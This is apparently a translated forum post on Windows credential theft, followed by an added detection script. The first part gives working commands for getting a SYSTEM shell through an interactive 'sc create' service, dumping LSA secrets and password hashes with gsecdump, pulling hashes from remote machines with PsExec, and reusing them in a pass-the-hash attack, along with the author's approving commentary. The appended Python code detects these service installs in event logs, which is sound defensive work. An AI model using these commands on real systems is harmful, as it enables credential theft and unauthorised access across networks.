To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to inject the hash information just grabbed with gsecdump into the local lsass process, implementing a hash-injection attack. The foreigners really are good at this; administrators will have their hands full now. The LM/NT hashes obtained during ARP spoofing, and those obtained with gethash, in fact never need to be cracked at all; it is purely a matter of using tools. As the original article puts it well, whether the password is set to 4 characters or 127, once you have the hash you are 100% done.
Original source: http://truesecurity.se/blogs/mur ... -text-password.aspx

I took a look at the original source; it seems to be from /2007/03/16/. Depressing; what a gap.
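A detection-side check for the technique shown above, added here as an example and not taken from the original post or from Truesec: both the `sc create` shell service and PsExec's PSEXESVC service leave an Event ID 7045 ("A service was installed in the system") record in the Windows System log, and a binary that is not a real service (cmd.exe here) additionally fails with error 1053, which the Service Control Manager logs as Event ID 7000 with the same "did not respond ... in a timely fashion" text the page prints. The event records below are constructed for this example; the field names, the `time` values and the 60-second correlation window are assumptions, not anything the page states.

```python
"""Score Windows System-log service-install records for the patterns on this page.

Signals checked per Event ID 7045 record (all constructed sample data):
  * the service binary is a command interpreter (cmd.exe via "sc create ... binpath=")
  * the service type is interactive ("sc create ... type= interact")
  * the service is PsExec's PSEXESVC
  * an Event ID 7000 start failure with error 1053 follows the install, which is
    what happens when a non-service executable is started through the SCM
"""
from collections import defaultdict

SHELL_BINARIES = {"cmd.exe", "command.com", "powershell.exe"}
ERROR_1053 = "did not respond to the start or control request in a timely fashion"
CORRELATION_WINDOW = 60  # seconds between 7045 and 7000 (assumed for this example)

# Constructed records reduced to the fields the check needs. "time" is an
# assumed monotonic timestamp in seconds; the type strings follow the 7045 wording.
SAMPLE_EVENTS = [
    {"id": 7045, "time": 100, "service": "shellcmdline",
     "image": r"C:\WINDOWS\system32\cmd.exe /K start",
     "type": "user mode service (interactive)", "start": "demand start"},
    {"id": 7000, "time": 131, "service": "shellcmdline",
     "message": "The shellcmdline service failed to start due to the following error: "
                "The service did not respond to the start or control request in a timely fashion."},
    {"id": 7045, "time": 500, "service": "PSEXESVC",
     "image": r"%SystemRoot%\PSEXESVC.exe",
     "type": "user mode service", "start": "demand start"},
    {"id": 7045, "time": 900, "service": "Spooler",
     "image": r"%SystemRoot%\System32\spoolsv.exe",
     "type": "user mode service", "start": "auto start"},
]


def binary_name(image_path):
    """Return the lowercase file name of the executable in an ImagePath value,
    tolerating a quoted path and trailing command-line arguments."""
    path = image_path.strip()
    if path.startswith('"'):
        path = path[1:].split('"', 1)[0]       # quoted path: take up to the closing quote
    else:
        path = path.split(" ", 1)[0]           # unquoted: first token is the path
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_installs(events):
    """Return [(service_name, score, reasons), ...] for every 7045 record,
    highest score first. Score is the number of matched signals."""
    failures = defaultdict(list)               # service name -> times of 1053 failures
    for ev in events:
        if ev["id"] == 7000 and ERROR_1053 in ev.get("message", ""):
            failures[ev["service"].lower()].append(ev["time"])

    findings = []
    for ev in events:
        if ev["id"] != 7045:
            continue
        reasons = []
        exe = binary_name(ev["image"])
        if exe in SHELL_BINARIES:
            reasons.append("command interpreter registered as the service binary")
        if "interactive" in ev.get("type", "").lower():
            reasons.append("interactive service type (sc 'type= interact')")
        if ev["service"].upper() == "PSEXESVC" or exe == "psexesvc.exe":
            reasons.append("PsExec remote-execution service installed")
        if any(0 <= t - ev["time"] <= CORRELATION_WINDOW
               for t in failures[ev["service"].lower()]):
            reasons.append("start failed with error 1053 shortly after install")
        findings.append((ev["service"], len(reasons), reasons))

    findings.sort(key=lambda f: f[1], reverse=True)
    return findings


if __name__ == "__main__":
    for name, score, reasons in score_installs(SAMPLE_EVENTS):
        print(f"{name:14s} score={score}")
        for r in reasons:
            print(f"    - {r}")
```

On the constructed data the `shellcmdline` install scores three signals and `PSEXESVC` one, while the legitimate Spooler record scores zero; in a real deployment the same logic would be fed from the System log (Event IDs 7045 and 7000) or, where service auditing is enabled, from Security Event ID 4697, and a 7045 record whose binary is an interpreter should be treated as high severity regardless of the other signals.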